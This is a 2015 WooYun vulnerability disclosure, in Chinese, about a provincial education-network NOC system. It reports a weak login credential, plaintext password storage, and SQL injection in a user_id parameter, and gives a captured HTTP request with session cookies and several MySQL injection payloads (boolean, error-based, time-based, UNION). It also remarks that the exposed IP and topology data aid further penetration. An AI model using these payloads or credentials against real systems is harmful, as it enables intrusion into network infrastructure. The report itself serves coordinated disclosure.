当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162664

漏洞标题:某省主节点NOC系统弱口令+SQL注入(需登录)

相关厂商:CCERT教育网应急响应组

漏洞作者: 路人甲

提交时间:2015-12-20 19:59

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:后台弱口令

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

某省 ,烦请第三方合作机构 - CCERT教育网应急响应组联系处理

详细说明:

弱口令:

http://**.**.**.**/noc/user_login.php
账号:mk
密码:aaaaaa


密码明文存储在页面:
登陆后在用户管理处查看其它用户信息,发现用户密码存在源码内

adminsouce-code_20151219123828.png


SQL注入+密码明文:
user_id参数过滤不严

GET /noc/usermodi.php?user_lx=show&user_id=27 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http://**.**.**.**/noc/user.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: qhnu_noc[user]=mk; qhnu_noc[access]=2; hkj=ipbjf97ht6k1ppa42c0e92vb90; JSESSIONID=4C33615E92A6FB59CE0A27B6D0A674C9; userNameForAutomaticSignin=aaaaaaaaa; domainNameForAutomaticSignin=NULL; isADAuth=false; passwordForAutomaticSignin=aaaaaaaaaaa; signInAutomatically=true; flashversionInstalled=19.0.0


PayLoad:

Parameter: user_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user_lx=show&user_id=27 RLIKE (SELECT (CASE WHEN (2900=2900) THEN 27 ELSE 0x28 END))
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user_lx=show&user_id=27 AND (SELECT 7032 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(SELECT (ELT(7032=7032,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user_lx=show&user_id=27 AND (SELECT * FROM (SELECT(SLEEP(5)))vJfV)
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: user_lx=show&user_id=-6284 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176786b71,0x6c48457778626256756a516f736c5a5966694a4458776e5a49544b5049486a74634946674e7a6354,0x71706b7071),NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -


sql_20151219124618.png

漏洞证明:

各 校 IP 地 址 段 :

ip_20151219114109.png


线路与接入单位电话:

联系电话2015-12-19_120716.png


IP 地 址 使 用 情 况:

校内IP地址使用情况2015-12-19_121019.png


IP 地 址 使 用 管 理:

校内IP地址管理2015-12-19_121059.png


通过以上信息可得知该省教育网网络拓扑,为后续渗透作了良好铺垫。是否该重视呢

修复方案:

改 && 过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-25 16:12

厂商回复:

通知处理中

最新状态:

暂无